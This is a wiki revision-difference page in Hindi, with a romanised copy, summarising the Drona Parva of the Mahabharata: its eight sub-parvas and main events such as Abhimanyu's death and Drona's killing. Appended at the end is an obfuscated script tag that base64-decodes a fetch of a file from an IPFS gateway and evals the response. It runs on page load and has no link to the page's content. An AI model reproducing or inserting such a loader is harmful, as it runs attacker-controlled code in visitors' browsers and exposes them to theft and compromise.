Difference between revisions of "द्रोण पर्व महाभारत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (1 अवतरण)
m (Text replace - "{{महाभारत}}" to "==अन्य लिंक== {{महाभारत}}")
Line 11: Line 11:
 
*नारायणास्त्रमोक्ष पर्व।
 
*नारायणास्त्रमोक्ष पर्व।
 
द्रोण पर्व में [[भीष्म]] के धराशायी होने पर [[कर्ण]] का आगमन और युद्ध करना, सेनापति पद पर [[द्रोण|द्रोणाचार्य]] का [[अभिषेक]], द्रोणाचार्य द्वारा भयंकर युद्ध, [[अर्जुन]] का संशप्तकों से युद्ध, द्रोणाचार्य द्वारा चक्रव्यूह का निर्माण, [[अभिमन्यु]] द्वारा पराक्रम और व्यूह में फँसे हुए अकेले नि:शस्त्र अभिमन्यु का [[कौरव]] महारथियों द्वारा वध, षोडशराजकीयोपाख्यान, अभिमन्यु के वध से पाण्डव-पक्ष में शोक, संशप्तकों के साथ युद्ध करके लौटे हुए अर्जुन द्वारा [[जयद्रथ]]वध की प्रतिज्ञा, [[कृष्ण]] द्वारा सहयोग का आश्वासन, अर्जुन का द्रोणाचार्य तथा कौरव-सेना से भयानक युद्ध, अर्जुन द्वारा जयद्रथ का वध, दोनों पक्षों के वीर योद्धाओं के बीच भीषण रण, कर्ण द्वारा [[घटोत्कच]] का वध, [[धृष्टद्युम्न]] द्वारा द्रोणाचार्य का वध।
 
द्रोण पर्व में [[भीष्म]] के धराशायी होने पर [[कर्ण]] का आगमन और युद्ध करना, सेनापति पद पर [[द्रोण|द्रोणाचार्य]] का [[अभिषेक]], द्रोणाचार्य द्वारा भयंकर युद्ध, [[अर्जुन]] का संशप्तकों से युद्ध, द्रोणाचार्य द्वारा चक्रव्यूह का निर्माण, [[अभिमन्यु]] द्वारा पराक्रम और व्यूह में फँसे हुए अकेले नि:शस्त्र अभिमन्यु का [[कौरव]] महारथियों द्वारा वध, षोडशराजकीयोपाख्यान, अभिमन्यु के वध से पाण्डव-पक्ष में शोक, संशप्तकों के साथ युद्ध करके लौटे हुए अर्जुन द्वारा [[जयद्रथ]]वध की प्रतिज्ञा, [[कृष्ण]] द्वारा सहयोग का आश्वासन, अर्जुन का द्रोणाचार्य तथा कौरव-सेना से भयानक युद्ध, अर्जुन द्वारा जयद्रथ का वध, दोनों पक्षों के वीर योद्धाओं के बीच भीषण रण, कर्ण द्वारा [[घटोत्कच]] का वध, [[धृष्टद्युम्न]] द्वारा द्रोणाचार्य का वध।
 +
==अन्य लिंक==
 
{{महाभारत}}
 
{{महाभारत}}
 
[[Category:पौराणिक कोश]]
 
[[Category:पौराणिक कोश]]
 
[[Category:महाभारत]]
 
[[Category:महाभारत]]
 
__INDEX__
 
__INDEX__

Revision as of 06:50, 21 March 2010

dron parv / Drona Parv

dron parv ke antargat 8 (up) parv aur 202 adhyay haian. in athoan (up) parvoan ke nam haian-

  • dronabhishek parv,
  • sanshaptakavadh parv,
  • abhimanyuvadh parv,
  • pratijna parv,
  • jayadrathavadh parv,
  • ghatotkachavadh parv,
  • dronavadh parv,
  • narayanastramoksh parv.

dron parv mean bhishm ke dharashayi hone par karn ka agaman aur yuddh karana, senapati pad par dronachary ka abhishek, dronachary dvara bhayankar yuddh, arjun ka sanshaptakoan se yuddh, dronachary dvara chakravyooh ka nirman, abhimanyu dvara parakram aur vyooh mean phanse hue akele ni:shastr abhimanyu ka kaurav maharathiyoan dvara vadh, shodasharajakiyopakhyan, abhimanyu ke vadh se pandav-paksh mean shok, sanshaptakoan ke sath yuddh karake laute hue arjun dvara jayadrathvadh ki pratijna, krishna dvara sahayog ka ashvasan, arjun ka dronachary tatha kaurav-sena se bhayanak yuddh, arjun dvara jayadrath ka vadh, donoan pakshoan ke vir yoddhaoan ke bich bhishan ran, karn dvara ghatotkach ka vadh, dhrishtadyumn dvara dronachary ka vadh.

any liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>